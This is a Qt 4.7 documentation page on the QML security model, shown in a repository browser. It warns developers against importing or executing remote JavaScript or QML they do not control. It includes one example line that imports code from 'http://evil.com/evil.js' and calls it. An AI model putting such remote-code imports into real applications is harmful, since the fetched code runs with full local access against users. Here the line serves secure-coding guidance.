source: trunk/doc/src/declarative/qdeclarativesecurity.qdoc@ 1010

Last change on this file since 1010 was 846, checked in by Dmitry A. Kuminov, 14 years ago

trunk: Merged in qt 4.7.2 sources from branches/vendor/nokia/qt.

File size: 3.2 KB
Line 
1/****************************************************************************
2**
3** Copyright (C) 2011 Nokia Corporation and/or its subsidiary(-ies).
4** All rights reserved.
5** Contact: Nokia Corporation (qt-info@nokia.com)
6**
7** This file is part of the documentation of the Qt Toolkit.
8**
9** $QT_BEGIN_LICENSE:FDL$
10** Commercial Usage
11** Licensees holding valid Qt Commercial licenses may use this file in
12** accordance with the Qt Commercial License Agreement provided with the
13** Software or, alternatively, in accordance with the terms contained in a
14** written agreement between you and Nokia.
15**
16** GNU Free Documentation License
17** Alternatively, this file may be used under the terms of the GNU Free
18** Documentation License version 1.3 as published by the Free Software
19** Foundation and appearing in the file included in the packaging of this
20** file.
21**
22** If you have questions regarding the use of this file, please contact
23** Nokia at qt-info@nokia.com.
24** $QT_END_LICENSE$
25**
26****************************************************************************/
27
28/*!
29\page qdeclarativesecurity.html
30\title QML Security
31\section1 QML Security
32
33The QML security model is that QML content is a chain of trusted content: the user
34installs QML content that they trust in the same way as they install native Qt applications,
35or programs written with runtimes such as Python and Perl. That trust is establish by any
36of a number of mechanisms, including the availability of package signing on some platforms.
37
38In order to preserve the trust of users, developers producing QML content should not execute
39arbitrary downloaded JavaScript, nor instantiate arbitrary downloaded QML elements.
40
41For example, this QML content:
42
43\qml
44import "http://evil.com/evil.js" as Evil
45... Evil.doEvil() ...
46\endqml
47
48is equivalent to downloading "http://evil.com/evil.exe" and running it. The JavaScript execution
49environment of QML does not try to stop any particular accesses, including local file system
50access, just as for any native Qt application, so the "doEvil" function could do the same things
51as a native Qt application, a Python application, a Perl script, etc.
52
53As with any application accessing other content beyond it's control, a QML application should
54perform appropriate checks on untrusted data it loads.
55
56A non-exhaustive list of the ways you could shoot yourself in the foot is:
57
58\list
59 \i Using \c import to import QML or JavaScript you do not control. BAD
60 \i Using \l Loader to import QML you do not control. BAD
61 \i Using \l{XMLHttpRequest}{XMLHttpRequest} to load data you do not control and executing it. BAD
62\endlist
63
64However, the above does not mean that you have no use for the network transparency of QML.
65There are many good and useful things you \e can do:
66
67\list
68 \i Create \l Image elements with source URLs of any online images. GOOD
69 \i Use XmlListModel to present online content. GOOD
70 \i Use \l{XMLHttpRequest}{XMLHttpRequest} to interact with online services. GOOD
71\endlist
72
73The only reason this page is necessary at all is that JavaScript, when run in a \e{web browser},
74has quite many restrictions. With QML, you should neither rely on similar restrictions, nor
75worry about working around them.
76*/
Note: See TracBrowser for help on using the repository browser.